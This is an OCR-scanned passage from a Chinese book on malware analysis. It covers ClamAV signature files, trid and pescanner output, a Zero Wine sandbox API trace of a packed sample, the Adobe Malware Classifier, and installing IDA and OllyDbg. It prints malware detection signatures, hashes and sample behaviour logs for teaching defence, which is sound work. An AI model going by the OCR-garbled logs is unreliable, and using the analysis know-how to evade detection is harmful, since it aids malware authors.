DDream-444578756853741426-Super.apk: Exploit.Andr.Lotoor-8 FOUND 


人 SCAN SUMMARY =----------- 
Known viruses: 1217159 

Engine version: 0.97.3 

Scanned directories: 0 

Scanned files: 1 

Infected files: 1 

Data scanned: 0.04 MB 

Data read: 1.58 MB (ratio 0.03:1) 
Time: 3.797 sec [0 m 3 s) 























由 于 REMnux 是 基于 特征 库 来 工作 的 ， 因 此 无 法 应 对 新 的 恶意 软 
件 ， 但 它 的 魅力 在 于 检测 恶意 软件 非常 方便 。 
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5.4 用 ClamAV 检测 恶意 软件 和 漏 
洞 攻击 


5.4.1 ClamAV 的 特征 文件 

我 们 刚才 使 用 的 clamscan 命令 ， 实 际 上 是 调用 GPL 协议 的 反 病 毒 
软件 ClamAV 对 恶意 软件 和 漏洞 攻击 进行 扫描 的 。 如 果 大 家 对 反 病 毒 软 
件 的 原理 感 兴趣 的 话 ， 可 以 看 一 看 这 个 软件 的 源 代码 。 



































e ClamAV 


http://www.clamav.net/ 











ClamAV 的 特征 文件 是 持续 更 新 的 ， 从 上 面 的 官方 网 站 可 以 下 载 到 


最 新 的 版 本 。 














Y ClamAV 特征 文件 下 载 





@ Clam Antivirus 


€ Q | © www.clamav.net/lang/en/ 


More stats 


Latest Stable Release 





Home Latest ClamAV6 stable release is: 0.97.4 
Doc & Wiki Windows Antivirus - Immunet 3.0, powered by ClamAV (Learn more) Mese] 1:97:19) 
About ClamAV 


3 i ClamAV Virus Databases: 
Mailing Lists main.cvd ver. 54 released on 11 Oct 2011 10:34 :0400 (sig count 1044387) 













Download daily.c 4991 released on 01 Jun 2012 14:10 :0400 (sig count: 201147) 
Official FAQ bytecode cvd ver. 185 released on 29 May 2012 11:39 :0400 (sig count 39) 
Submit a file s sing.cvd ver. 39130 released on 01 Jun 2012 14:00 :0400 (sig count: 1349119) 
EOL policy 
Bug tracker 
Contacts Latest Development Release (Release Candidates) 
News feeds 
blog (28) There are no Release Candidates currently planned. 
in the press (24) 
misc (71) Bib 





E -一 -一 —— — 








这 里 发 布 的 特征 文件 扩展 名 为 .cvd， 其 中 main.cvd 为 基本 数据 库 ， 
daily.cvd 为 每 日 新 增 的 特征 数据 库 。 
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新 发 现 的 恶意 软件 首先 会 被 添加 到 daily.cvd 中 ， 等 到 稳定 之 后 会 被 





转移 到 main.cvd 中 。 
检测 恶意 软件 的 方法 主要 有 以 下 几 种 。 




















。 使 用 文件 整体 的 散 列 值 
。 使 用 文件 内 部 特定 的 数据 序列 
。 为 了 避免 误 判 设置 某 些 白 名 单 


ClamAV 的 特点 是 ， 上 述 各 项 功能 都 是 通过 单独 的 文件 分 别 实现 的 。 











ClamAV 的 网 站 上 公开 了 向 特征 文件 添加 新 项 目的 
看 一 看 。 


* Creating signatures for ClamAV 


http://www.clamav.net/doc/latest/signatures.pdf 


5.4.2 MEH .cvd 文件 








.cvd 文件 实际 上 是 通过 tar.gz 压缩 的 ， 我 们 将 文件 








节 删 掉 之 后 ， 就 可 以 用 tar 命令 解压 缩 了 。 


V 删除 开头 的 512 个 字 节 





Stirling - [: = 
PIME) BEE) RR- 移动 (S) BEO) NOW) AD (H) -|slx 
Dag ^ alls] galta [es feat] Aa eea ol lle ele] 















ADDRESS 
0 


000014 
00000 
0000016 
0000 
0000018 
0000019 

A 


000001B 
0000010C0 
000001D0 
000 

00000 20 2 2U 2 
0000 00 00 

IUD 92 2E BC B7 5B Bl 3F 22 C3 37 D3 3D 2B DI F8 46 .. +h 

Wu 15 BD EF 24 D8 12 D5 4D 8F 24 6A 44 BS DB ED 9B .3.xJ.24.$ 

Mn 20 92 oN 91 AR RR AQ An AR QA R? na 1F FF F? F? Of l'eY +} e 
AIR : 0x00000000~0x000001FF Ox200(512)Bytes  [0x00000200 [ [ES [4715878 Bytes — |SHIF 7 





格式 ， 大 家 可 以 





T 头 的 512 个 字 
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到 





TT 





RATH — E ril Zi A 
成 tar.gz 并 解压 缩 。 


fit HE BR IP SK AY 512 个 字 节 ， 然 后 将 扩展 名 改 











v 运行 示例 


$ cp main.cvd main.tar.gz 

$ tar zxvf main.tar.gz 

SEES 

COPYING  main.db main.hdb main.mdb main.tar.gz 
main.cvd main.fp main.info main.ndb main.zmd 














这 里 面 的 文件 都 是 文本 格式 ， 打 开 之 后 我 们 可 以 看 到 里 1 
件 散 列 值 、 特 定数 据 序列 以 及 恶意 软件 的 名 称 等 信息 。 


= 


ATX 














V 用 文本 编辑 器 打开 main.db 


SbfTe401 :Trojan iE 1420 
847 cTd0:Trojan.Downl oader-1421 
ef 67bbe7eefl Sef73215511674216:Trojan .Downl oader-1422 
b6320148122104150445ea2684c9f :Trojan .Downl oader-1423 
7115026631 :Trojan Down] oader-1424 
55204 :4af89f0d219f944 Hotere Bicot Troian ert, 
356984 : 2bfb53d76891059b79122e13d1537e4a ‘Trojan .Bancos-20b4 
NE pb olal ba? decal 87 340880: Trojan. Bancos -2065 
851719b032db139800d90ca8811d22b :Trojan.Bancos-2056 
"EE :6cb572fq2452416dc4ea09e3adg17e66:Trojan Bancos-2067 
370688: 134995677 230061649d30ea06d7b0a1 :Trojan.Bancos-2058 
999360 :8578b664706cfdc2f053680baclblb6e:Trojan.Bancos-2059 
I2: ebZaf250bba3el bal e9cb17629383dd Trojan .Bancos-2060 
622592 :8a236340c0a8c76343f6fb581 314 fadf ‘Trojan .Bancos-2061 














5.4.3 ”被 检测 到 的 文件 详细 信息 

我 们 用 clamscan 可 以 对 文件 进行 扫描 和 检测 ， 如 果 需 要 更 详细 的 信 
息 ， 还 需要 使 用 其 他 一 些 命令 。 

例如 ， 我 们 可 以 试 一 下 trid 命令 。 











v 运行 示例 


$ trid mal.exe 

TrID/32 - File Identifier v2.00/Linux - (C) 2003-06 By M.Pontello 
Definitions found: 3887 

Analyzing... 
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Collecting data from file: mal.exe 


38.4$ (.EXE) Win32 Executable Generic (8527/13/3) 

34.1% (.DLL) Win32 Dynamic Link Library (generic) (7583/30/2) 
9.3% (.EXE) Winl6/32 Executable Delphi generic (2072/23) 
9.0% (.EXE) Generic Win/DOS Executable (2002/3) 

9.0% (.EXE) DOS Executable Generic (2000/1) 





通过 这 个 示例 我 们 可 以 看 出 ，mal.exe 为 .EXE 或 者 .DLL 文件 的 可 
能 性 最 高 。 实 际 上 ，mal.exe 就 是 一 个 Win32 Executable Generic 文件 。 


5.4.4 检测 所 使 用 的 打包 器 以 及 疑似 恶意 软件 的 文件 


使 用 pescanner 命令 可 以 根据 文件 的 元 数据 检测 出 所 使 用 的 打包 器 
或 者 疑似 恶意 软件 的 文件 。 


























v 运行 示例 


$ pescanner mal.exe 


Meta-data 

File: mal.exe 

Size: 12345 bytes 

Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit 
MD5: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 

SHA1: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 


ssdee p: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 


Date: 0x2A425R19 [Fri Jun 19 22:22:17 1992 UTC] [SUSPICIOUS] 
EP: 0x418001 .aspack 6/8 [SUSPICIOUS] 
CRC: Claimed: 0x0, Actual: 0xa62f [SUSPICIOUS] 


Signature scans 


Clamav: mal.exe: Trojan.Spy-68202 FOUND 





其 中 标 有 “SUSPICIOUS” 的 项 目 表示 “可 疑 "， 也 就 是 说 ， 这 里 的 信 
息 有 可 能 是 假 的 (有 可 能 是 恶意 软件 ) 不 过 ， 这 些 地 方 仅仅 是 “可 疑 ”而 
已 ， 即 使 出 现 很 多 SUSPICIOUS, ， 也 并 不 能 断定 这 就 是 一 个 恶意 软件 。 

通过 上 面 的 信息 ， 我 们 还 能 看 出 这 个 EXE 文件 使 用 了 ASPack 进行 
打包 。 
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5.5 用 Zero Wine Tryouts 分 析 恶 
意 软 件 


5.5.1 REMnux 与 Zero Wine Tryouts 的 区 别 


Zero Wine Tryouts 是 男 外 一 个 恶意 软件 分 析 工 具 ， 它 的 原理 和 
REMnux 不 同 。Zero Wine Tryouts 是 一 个 开源 的 自动 分 析 工 具 ， 只 要 将 
文件 上 传 上 去 就 可 以 显示 结果 ， 非 常 方便 。 与 REMnux 的 不 同 点 在 于 ， 
它 主 要 通过 动态 分 析 来 得 出 结果 。 























e Zero Wine Tryouts 


http://zerowine-tryout.sourceforge.net/ 


5.5.2 ”运行 机 制 


Zero Wine Tryouts 运行 在 开源 虚拟 机 QEMU 上 。 输 入 任意 的 EXE 
文件 或 者 PDF 文件 后 ， 它 会 将 其 在 沙 箱 〈 受 保护 的 空间 ) 中 运行 ， 并 输 
出 日 志 。 

Zero Wine Tryouts 以 系统 镜像 的 形式 发 布 ， 可 直接 在 QEMU 上 运行 。 

启动 后 ， 它 会 自动 打开 一 个 HTTP 服务 器 ， 通 过 网 页 可 以 上 传 任意 
的 EXE 文件 并 进行 分 析 。 

其 内 部 是 一 个 基于 Wine 的 沙 箱 环境 。Wine 是 一 个 能 够 在 Linux、 
BSD, Solaris, OS X 等 非 Windows 环境 下 运行 Windows 程序 ( PE X 
件 ) 的 运行 时 库 。 























e Wine 


http://www.winehq.org/ 
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在 沙 箱 环境 中 运行 的 恶意 软件 会 生成 日 志和 报告 


5.5.8 ”显示 用 户 界面 

我 们 来 试 试看 。 

将 start img.bat 和 zerowine.img 复制 到 QEMU 的 目录 中 ， 然 后 运行 
start img.bat。 

这 样 一 来 ，QEMTU 会 自动 运行 ， 并 启动 镜像 中 的 操作 系统 ， 显 示 登 
录 画 面 。 

即便 不 登录 系统 ， 系 统 中 的 功能 实际 上 已 经 启动 了 。 如 果 要 登录 的 
话 ， 可 以 使 用 下 面 任意 一 组 用 户 名 和 密码 。 

















e HAZ: root; 密码 : zerowinet 
e HAZ: malware; 密码 : malware1 





下 面 我 们 通过 浏览 器 访问 http://localhost:8000 这 个 地 址 。 











启动 Zero Wine 并 访问 http://localhost:8000 





[localhost:8000 x 


€ > QC D localhost:8000 ES 








Zero Wine Tryouts: A Malware Analysis Tool 


Upload | View | Download | Search 


Upload a sample 
Select the sample file to upload and the options to analyze it. 


Sample file (e.g. EXE file, DLL file, PDF file) | 选择 文件 未 选择 任何 文件 
Tags (separate with comma) 
Additional files (zip archive file) 选择 文件 | 未 选择 任何 文件 
Dynamic analysis timeout at 90 seconds 
Dump Process memory at 0 seconds 
Set Windows version to WindowsxPsPs B 
Unpack sample file 

m 提交 


Windows is a registered trademark of Microsoft Corp. in the U.S. and other countries. 


Copyright (c) 2008, 2009 Joxean Koret 

















四 
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用 户 界 面 非常 简洁 易 懂 。 

正如 网 页 上 所 提示 的 那样 ， 我 们 只 要 选择 EXE 文件 或 者 PDF 文件 
并 按 “ 提 交 ” 按 钮 就 可 以 开始 分 析 了 。 根 据 环境 和 文件 的 不 同 ， 有 些 分 
析 可 能 会 非常 耗 时 。 





5.5.4 ”确认 分 析 报 告 
分 析 完 成 之 后 ， 我 们 就 可 以 查看 分 析 报 告 。 


Y Zero Wine Tryouts 的 分 析 结 果 





Q localhost:8000/cgi-bin/v 


E © © localhost:8000/cgi-bin/view.py | Q 2 


Sample analysis result 


Original file name: kates.exe 


MDS: dibfabe03Se5c8eaaac44d18470a954b 

SHA-1: 7a53645b88b8c065673970e438755b241277b90d 

SHA-224: 47c32d8aedii4a553f4a76d926e2eea24d8a6b4d480b13d3a051e80b 
SHA-256: 4d73b21f1523f106ed6ci3df2863fea4ab2deeb9e83bbb2cib054fbfba3b4dc7 


SHA-384: 29d797c47d2b97083a58ea6eefe57ecdbal5e99dc7c1973c0909b3b7d7fd1fda762575f£29f0a044d06d29s 
SHA-512: 


19675b6bc9bcaa5616a352e396c252b374576d5d9a46403f1fcla9dd0c7eb3c8eb76044892a3a3ff188442a750ebe4€ 


General information: 





Œ Report El File headers © File strings d signatures @ piffere 


0008:8tarting process L”C:¥¥0Gr9jeeV-exe” (entryproc=0x418001) 
0008:Call KERNEL32 .GetModuleHandleA (004190d4 "kernel32.dl!l") ret-00418045 
0009:Cal! KERNEL32.GetProcáddress(7edb0000,004190e| “VirtualAlloc”) ret=0041805b 
0009:Cal! KERNEL32.GetProcAddress(?edb0000,004190ee “VirtualFree”) ret= cm 
0009:Call KERNELS2.VirtualAl Tae ETE D0001800,00001000,00000004) re! 
Ir loaddll:free modref Unloaded module L’C:¥¥windows¥¥systen32¥¥uxthem Fir Š builtin 
0009:Cal! KERNEL32.' "Virtual lae (G00000007 0801 iffe, 00001000,00000004) ret-004 
000d:Cal | advapi32.RegOpenKeyExW (00000044, 7ecbb3e6 L"ProzlD",DDDDDODO , 00020018, B01334c4) ret=7ebff396 
000d:Gal | advapi32.RegGetyaluey(00000044,00000000,7ec6b4c0 L”Content fype”,00060002,00000000,00000000,0033f68c) ret=7ec00379 
O00d:Cal! KERNEL32.InterlockedDecrement (001334! be) Ug ‘Tebff0c3 
000d:Cal| advapi32.l -Roatlosetiey 00000044) ret=7ebf 
000d:Call advapi32.RegCloseKey (00000000) re 
itrace:loadd||:free_modref Unloaded module L”C:¥¥windows¥¥system32¥¥shiwapi.dll” : builtin 
Üb:Call KERNEL32-ExitProcess (00000000) ret-7edaüclf 
000b:Call PE DLL (proc-üxTea5c5?c modul 7e9a0000 L'user32.dll",reason-PROCESS DETACH, res: od 
000b:Call PE DLL (proc-üxTe7047f8,modul 7e680000 L"winexll.drv^,reason-cPROCESS DETACH, 
|000b:Call PE DLL (proczüx7e5382c4,modul 16520000 L"inn32.dl |", reason-PROCESS DETACH, res= CL 
000b:Call KERNEL32.TIsFree(00000000) re: 
000b:Call PE DLL RE 




















PROCESS DETACH, res=0x1) 





000b:Call PE DLL (proc=0x7ed188b4, modul OCESS DETACH, res=0x1 ) 
i proc=0x7ee54d58 ,modul N 32.411” PROCESS _DETACH ,res=Ox1 ) 

E proczÜxTef cf de4 modi L^ntdl dll”, mee PROCESS DETACH, reszÜx1) 

000d :Call Shivapi cassocbuceySt ninel 0000000. 0800000， 00132308, 7ed9b37e ,00000000, (0335 424) ret=7ed92ef9 

000d:Cal! shel 132.102 (00000000 ,0033f320,00000000 , 7ebd2004,0033f950) ret=7eb9caBl 

000d :Cal I prr sid retzTec2bddd 





000d:Cal| KERNEL32 Inter lockedDecrement (001318fc) ret-Tec2bef8 
O00d:Cal| KERNEL32. Inter lockedIncrement (001334bc) ret-Tebff033 
3l m 









































分 析 报 告 中 包含 以 下 这 些 部 分 ， 这 些 信息 对 恶意 软件 分 析 都 非常 


有 用 。 





e Report: API 函数 调用 日 志 
e File headers : 文件 头 以 及 相应 的 特征 信息 
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* File strings: 文件 所 包含 的 字符 串 
* Signatures : 文件 的 特征 码 
* Differences : 运行 前 后 发 生变 化 的 文件 和 注册 表 日 志 


V Report 


0009:Starting process L"C:\\***.exe" (entryproc-0x418001) 
0009:Ca KERNEL32.GetModuleHandleA(004190d4 "kernel32.dll" 
ret-00418045 
0009:Ca KERNEL32.GetProcAddress 
(7edb0000,004190e1 "VirtualAlloc") ret-0041805b 
0009:Ca KERNEL32.GetProcAddress 
(7edb0000,004190ee "VirtualFree") ret-0041806f 
0009:Ca KERNEL32.VirtualAlloc 
(00000000,00001800,00001000,00000004) ret=004180c2 
trace:loaddll:free modref Unloaded module 
L"C: \\windows\\system32\\uxtheme.dll" : builtin 
0009:Ca KERNEL32.VirtualAlloc 
(00000000, 00011f£0e, 00001000,00000004) ret=004180e0 
000d:Ca advapi32.RegOpenKeyExW 
(00000044,7ec6b3e6 L"ProgID",00000000,00020019,001334c4) 
retz7ebff396 
000d:Call advapi32.RegGetValueW 
(00000044,00000000,7ec6b4c0 L"Content Type", 
00000002,00000000,00000000,0033£68c) ret-7ec00379 
000d:Ca KERNEL32.InterlockedDecrement(001334bc) ret-7ebff0c3 
000d:Ca advapi32.RegCloseKey(00000044) ret-7ebff18b 
000d:Ca advapi32.RegCloseKey(00000000) ret-7ebffl9c 
trace:loaddll:free modref Unloaded module 
L"c: \\windows\\system32\\shlwapi.dll" : builtin 

















省 略 


V File headers 


38.4$ (.EXE) Win32 Executable Generic (8527/13/3) 

34.1% (.DLL) Win32 Dynamic Link Library (generic) (7583/30/2) 
9.3% (.EXE) Winl6/32 Executable Delphi generic (2072/23) 
9.0% (.EXE) Generic Win/DOS Executable (2002/3) 

9.0% (.EXE) DOS Executable Generic (2000/1) 
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[IMAGE DOS HEADER] 

0x0 0x0 e magic: 0x5A4D 
0x2 0x2  e cblp: 0x50 
省 略 


V File strings 


省 略 

kernel32.dll 

VirtualAlloc 

VirtualFree 

ExitProcess 

user32.d11 

MessageBoxA 

wsprintfA 

LOADER ERROR 

The procedure entry point $s could not 
be located in the dynamic link library 
$sThe ordinal šu could not be located 
in the dynamic link library $s 
kernel32.dll 

GetProcAddress 

GetModuleHandleA 

LoadLibraryA 


省 略 
V Signature 


0009:Starting process L"C:\\***.exe" (entryproc-0x418001) 


End of signature. See report for more information. 


V Differences 


/ home/malware/.wine/.update-timestamp 
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c:/*** exe 
--- /home/malware/.winebackup/system.reg 

2010-07-24 05:35:43.000000000 +0200 
+++ /home/malware/.wine/system.reg 

2012-05-22 14:22:56.000000000 +0200 
@@ -14296 +14296 @@ 
- [Software\\Microsoft\\Windows\\CurrentVersion\\Fonts] 1279942537 
+ [Software\\Microsoft\\Windows\\CurrentVersion\\Fonts] 1337689369 
@@ -19182 +19182 @@ 
- [Software\\Microsoft\\Windows NT\\CurrentVersion\\Fonts] 
1279942537 
+[Software\\Microsoft\\Windows NT\\CurrentVersion\\Fonts] 
1337689369 
@@ -20321 +20321 @@ 
省 略 


和 REMnux 不 同 的 是 ，Zero Wine 可 以 将 运行 日 志 总 结 成 报告 ， 
此 对 于 静态 分 析 所 无 法 触及 的 部 分 十 分 有 效 。 不 过 ， 由 于 分 析 非 常 耗 
时 ， 而 且 分 析 结 果 的 可 信 度 也 尚 有 一 定 问题 ， 因 此 这 个 工具 还 没有 达到 
实用 的 程度 。 

登录 进去 之 后 我 们 可 以 看 到 它 的 工作 原理 ， 因 此 建议 大 家 登录 进去 
看 一 看 。 


E 






































一 专栏 : 党 试 开 发 自己 的 工具 
市 面 上 已 经 有 很 多 安 ， 要 编写 这 些 工具 ， 必 须 具 备 一 定 
的 计算 机 安全 方面 的 知识 。 
然而 ， 仅 具备 安全 方面 的 知识 还 不 够 ， 就 好 像 要 编写 财务 软件 
需要 既 懂 财 务 又 懂 编 程 ， 要 编写 音乐 软件 也 需要 既 懂 音乐 又 懂 编 程 。 
同时 具备 安全 和 编程 两 方面 技术 的 人 们 进行 了 长 年 累 月 的 研究 
和 开发 ， 托 他 们 的 福 ， 现 在 我 们 终于 可 以 比较 轻松 地 进行 二 进 制 分 
析 和 安全 调查 了 。 
换 句 话说 ， d BE 
如 果 有 兴趣 的 话 ， 希 望 大 家 能 够 兴 试 自己 编写 一 个 
来 方便 的 分 析 或 者 安 o 
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,使 用 起 
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56 ”尽量 减少 人 工分 析 : 启发 式 技术 


5.6.1 恶意 软件 应 对 极限 的 到 来 : 平均 每 天 60000 个 
下 面 我 们 来 聊 一 聊 业 界 最 新 的 话题 。 
传统 的 反 病毒 软件 都 是 以 黑 名 单方 式 为 基础 的 ， 即 “按照 事先 列 出 
的 黑 名 单 ， 查 找 符合 条 件 的 对 象 "。 然 而 ， 这 种 方式 的 极限 正在 逐步 显 
现 。 随 着 恶意 软件 数量 的 增加 ， 通 过 人 工分 析 并 更 新 特征 文件 的 方式 ， 
以 数据 库 作为 武器 的 检测 手段 终 将 迎 来 其 处 理 极限 。 
遗憾 的 是 ， 被 发 现 的 恶意 软件 的 数量 每 年 都 在 快速 增加 。 有 报告 
你 ， 现 在 平均 每 天 可 以 检测 到 60000 个 恶意 软件 。 



































T 





e McAfee Q1 Threats Report Reveals Surge in Malware and Drop 
in SPAM 
http://www.mcafee.com/cn/about/news/2011/92/20110601-01.aspx 


因此 ， 我 们 必须 尽 可 能 地 让 恶意 软件 的 分 析 实 现 自动 化 ， 以 减少 人 
工作 业 的 比例 。 但 即便 恶意 软件 的 分 析 能 够 完全 自动 化 ， 我 们 也 必须 首 
对 特征 文件 变 得 越 来 越 大 的 问题 。 


























5.6. ”启发 式 技术 革命 


出 于 上 述 原因 ， 在 恶意 软件 的 检测 方面 耻 需 技术 创新 。 目 前 ， 对 悉 
意 软件 的 “行为 检测 ”， 即 启发 式 技术 ， 正 在 受到 广泛 的 关注 。 





























。“ 频 繁 访问 注册 表 的 行为 ， 疑 似 恶意 软件 ” 
。“ 频 繁 收发 小 的 网 络 数据 包 ， 疑 似 恶意 软 件 ” 
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像 上 面 这 样 ， 启 发 式 技术 是 对 恶意 软件 的 行为 特征 进行 归 类 ， 并 将 
符合 这 些 特征 的 软件 判定 为 恶意 软件 。 

基于 这 些 研究 ， 目 前 很 多 反 病 毒 软件 都 集成 了 启发 式 引 擎 ， 作 为 软 
件 功能 的 一 部 分 来 使 用 。 

















TE 





* Adobe Malware Classifier 


http://sourceforge.net/projects/malclassifier.adobe/ 














1 于 启发 式 引 擎 都 是 各 公司 自主 研发 的 ， 因 此 外 人 很 难 接触 到 其 核 
心 技术 。 不 过 ，2012 年 4 月 ，Adobe 公司 发 布 了 一 款 开源 的 恶意 软件 检 
测 引擎 一 一 Adobe Malware Classifier. 

这 个 引擎 可 以 对 Windows 可 执行 文件 (PE 文件 ) 进行 恶意 软件 检 
测 ， 程 序 本 身 是 用 Python 编写 的 。 

Adobe Malware Classifier 包括 四 个 独立 的 检测 算法 ， 可 分 别 对 目标 
程序 进行 评分 。 

如 果 所 有 的 检测 算法 都 被 判定 为 恶意 软件 ， 则 最 终结 果 会 显示 1。 

相对 地 ， 如 果 所 有 的 检测 算法 都 被 判定 为 非 恶 意 软件 ， 则 最 终结 果 
会 显示 0。 

此 外 ， 如 果 各 检测 算法 的 结论 不 一 致 ， 则 显示 UNKNOWN. 

在 源 代码 的 开头 ， 还 发 布 了 该 引擎 的 准确 率 测试 结果 ， 非 常 有 意思 。 





















































































































































Y AdobeMalwareClassifier.py 


Results on dataset of ~130000 dirty, ~ 16000 clean files: 
(False Positives, True Negatives, True Positives, rates 





J48 FP TN IDE FN WWE Jede FP Rate Accuracy 
7683 37171 130302 3451 0.97419871 0.171289071 0.937662018 
J48Graft FP TN TP FN UP Ra FP Rate Accuracy 
6780 38074 129087 4666 0.96511480 0.151157087 0.935915166 
PART EP TN TE FN TP Rate FP Rate Accuracy 
7074 36492 125060 9412 0.93000773 0.162374329 0.907401791 
Ridor FP. EN TP FN TP Rate EP Rate Accuracy 




















7390 37935 114194 20930 0.84510523 0.163044677 0.843058149 






































工具 探索 更 广阔 的 世界 





这 里 是 对 大 约 13 万 个 恶意 软件 和 16000 个 正常 软件 进行 测试 ， 并 
统计 每 个 检测 算法 的 准确 率 。 

其 中 各 数值 上 面 的 FP、TN、TP、FN 都 是 缩写 ， 它 们 代表 的 含义 
如 下 。 











* FP ( False Positive， 假 阳性 ) : 将 正常 文件 误 判 为 恶意 软件 
* TN (True Negative， 真 阴性 ) : 将 正常 文件 判定 为 正常 文件 
e TP ( True Positive， 真 阳性 ) : 将 恶意 软件 判定 为 恶意 软件 

* FN ( False Negative， 假 阴性 ) : 将 恶意 软件 判定 为 正常 文件 


TP Rate 表示 将 恶意 软件 判定 为 恶意 软件 的 概率 ， 其 计算 公式 为 
TP +(TP+EN), 即 130302 + (130302+3451)=0.97419871. 

MZ, FP Rate 则 表示 将 正常 文件 误 判 为 恶意 软件 的 概率 ， 结 曙 
0.171289071。 

最 后 的 Accuracy 表示 准确 率 。 

简单 总 结 如 下 。 





























为 


A 























* 将 恶意 软件 判定 为 恶意 软件 的 概率 ( 真 阳 性 ) : 90% 以 上 
。 将 正常 文件 判定 为 正常 文件 的 概率 ( 真 阴性 ) : 不 到 85% 


85% 和 90% 代表 每 10 次 就 会 误 判 一 次 ， 不 过 也 许可 以 通过 四 个 算 
法 进行 独立 评分 来 弥补 一 下 。 




















5.6.3 ”用 两 个 恶意 软件 进行 测试 
下 面 我 们 用 第 1 章 中 的 两 个 恶意 软件 来 测试 一 下 。 

















v 运行 示例 
C:\>AdobeMalwareClassifier.py -v -f wsample01a.exe 


Starting dump of wsample0la.exe 
DebugSize: 28 
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ImageVersion: 0 
IatRVA: 8868 
ExportSize: 0 
ResourceSize: 436 


VirtualSize2: 1720 
NumberOfSections:5 


Stop 

Processing all... 

1 J48 算 法 的 检测 结果 

1 J48Graft 算 法 的 检测 结果 
T PART 算法 的 检测 结果 

0 Ridor 算 法 的 检测 结果 


UNKNOWN RAR 








在 运行 工具 时 加 上 -v 选项 ， 可 以 显示 出 评分 过 程 中 所 用 到 的 值 。 

Adobe Malware Classifier 是 通过 PE 文件 头 的 值 来 判断 恶意 软件 的 ， 
并 根据 四 个 算法 的 检测 结果 显示 最 终结 论 。 

pus exe 只 是 一 个 显示 消息 框 的 简单 程序 ， 但 四 个 算法 中 有 
三 个 都 给 出 了 恶意 软件 的 结论 。 

Las AN. 启发 式 恶 意 软件 检测 技术 不 同 于 传统 的 
黑 名 单方 式 ， 误 判 率 很 高 ， 因 此 到 现在 也 未 能 成 为 一 种 确实 有 效 的 检 
测 手 段 。 

如 果 大 家 对 安全 技术 ， 尤 其 是 对 恶意 软件 方面 的 技术 感 兴趣 ， 而 
且 有 机 会 从 事 相 关 研究 ， 那 么 启发 式 技术 可 以 说 是 一 个 非常 有 趣 的 研 
究 方 向 。 
































附录 


A.1 IDA 





IDA 的 Demo 版 和 免费 版 都 可 以 从 官方 网 站 进行 下 载 。 


https://www.hex-rays.com/products/ida/support/download.shtml 


Demo 版 的 版 本 比较 新 ， 但 其 功能 有 所 限制 ， 如 果 没 有 什么 特别 的 
原因 ， 还 是 建议 使 用 免费 版 。 

IDA 目前 (2013/05 ) 的 最 新 版 本 为 6.4， 免 费 版 为 比较 老 的 5.0 版 
本 。 不 过 ， 由 于 其 反 编译 方面 的 功能 已 经 非常 成 熟 ， 因 此 对 于 初学 者 来 
说 已 经 完全 够 用 了 。 
































V IDA 网 页 ( https://www.hex-rays.com/products/ida/support/download.shtml ) 


ll ID^ Support: Download ce x 


€ -> C B ntps//www.hex-rays.com/products/Ida/support/download.shtml 


IDA Support: Download Center 


Evaluation & Freeware versions of IDA 


* IDA demo download: evaluate a limited version of our disassembler 
* IDA 5.0 Freeware: free for non-commercial use. 


SDK & Utilities 


* IDA SDK 6.4: develop processor modules, loaders and extensions - extended with the source of 30+ modules and 
20* loaders. 
Flair 6.4 add your own compiler libraries to the FLIRT engine. 
Tilib 6.4 create your own type libraries. 
Linux/Mac Tvision 2009b port for the IDA Interface - source code 
Loadint 6.4 create your own disassembler comment databases 
idsutils 6.4 create your own IDS files from DLLs. 
Qwingraph v1.10: source code the Wingraph we use and modified (GPL). 
PIN tool: the source code of our PIN tool. It creates a debugger backend out of Intel's PIN framework 











从 Demo 版 的 链接 IDA demo download 点 进去 ， 可 以 找到 免费 版 
IDA 5.0 Freeware 的 下 载 链 接 ， 点 击 进 入 下 载 页 面 。 

















A.1 安装 IDA 


V Setup 


a. Setup — IDA Pro Free v5.0 


Welcome to the IDA Pro Free v5.0 
Setup Wizard 


This will install IDA Pro Free v5.0 on your computer. 


It is recommended that you close all other applications before 
continuing. 


Click Next to continue, or Cancel to exit Setup. 


FREEWARE 
Version 5.0 


Hex-Rays 2010 





Y License Agreement 


ED Setup - IDA Pro Free v5.0 


License Agreement 
Please read the following important information before continuing. 





Please read the following License Agreement, You must accept the terms of this 
agreement before continuing with the installation. 


IDA Pro Freeware 5.0 


This free version of IDA Pro is licensed to you For non-commercial 
use. Commercial use requires a normal IDA Pro license. 

This license restriction supersedes other provisions in the standard 
IDA Pro license below. 


IThe IDA Pro computer programs, hereafter described as "the software" 
are licensed, not sold, to you by Hex-Rays SA pursuant to the 

terms and conditions of this Agreement. Hex-Rays 5A reserves any 
right not expressly granted to you. You own the media on which the 


cept the agreemef 


Ol do not accept the agreement 
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V 选择 安装 目录 
ED Setup — IDA Pro Free v5.0 


Select Destination Location 
Where should IDA Pro Free v5.0 be installed? 


al Setup will install IDA Pro Free v5.0 into the following Folder. 


To continue, click Next. IF you would like to select a different Folder, click Browse. 


Browse... 











At least 23.8 MB of free disk space is required. 





y 选择 是 否 创 建 快捷 方式 
ED Setup — IDA Pro Free v5.0 
Select Additional Tasks 


Which additional tasks should be performed? 


Select the additional tasks you would like Setup to perform while installing IDA Pro Free 
v5.0, then click Next. 


Additional icons: 








A.1 


V 安装 配置 确认 


ED Setup - IDA Pro Free v5.0 


Ready to Install 
Setup is now ready to begin installing IDA Pro Free v5.0 on your computer, 


Click Install to continue with the installation, or click Back if you want to review or 
change any settings. 





Destination location: 
C:¥Program Files¥IDA Free 


Additional tasks: 
Additional icons: 
Create a desktop icon 











安装 IDA 





v 安装 开始 
á Setup - IDA Pro Free v5.0 


Installing 
Please wait while Setup installs IDA Pro Free v5.0 on your computer. 


Extracting files... 
C:¥Program Files£IDA Free¥ids¥win¥mfco4Od.ids 
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V 安装 结束 


ED Setup - IDA Pro Free v5.0 


EDAM iPro Completing the IDA Pro Free v5.0 


Setup Wizard 


Setup has Finished installing IDA Pro Free v5.0 on your 
computer, The application may be launched by selecting the 
installed icons. 


Click Finish to exit Setup. 


FREEWARE 
Version 5.0 


Hex-Rays 2010 











如 果 选 择 创 建 快捷 方式 ( Create a desktop icon )， 安 装 程序 会 在 桌 
打上 放置 一 个 图 标 。 将 其 他 可 执行 文件 拖 忠 到 这 个 图 标 上 ， 就 可 以 用 
IDA 快速 打开 它 。 
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A.2 安装 OllyDbg 








OllyDbg 可 以 从 下 面 的 网 站 下 载 。 











http://www.ollydbg.de/ 





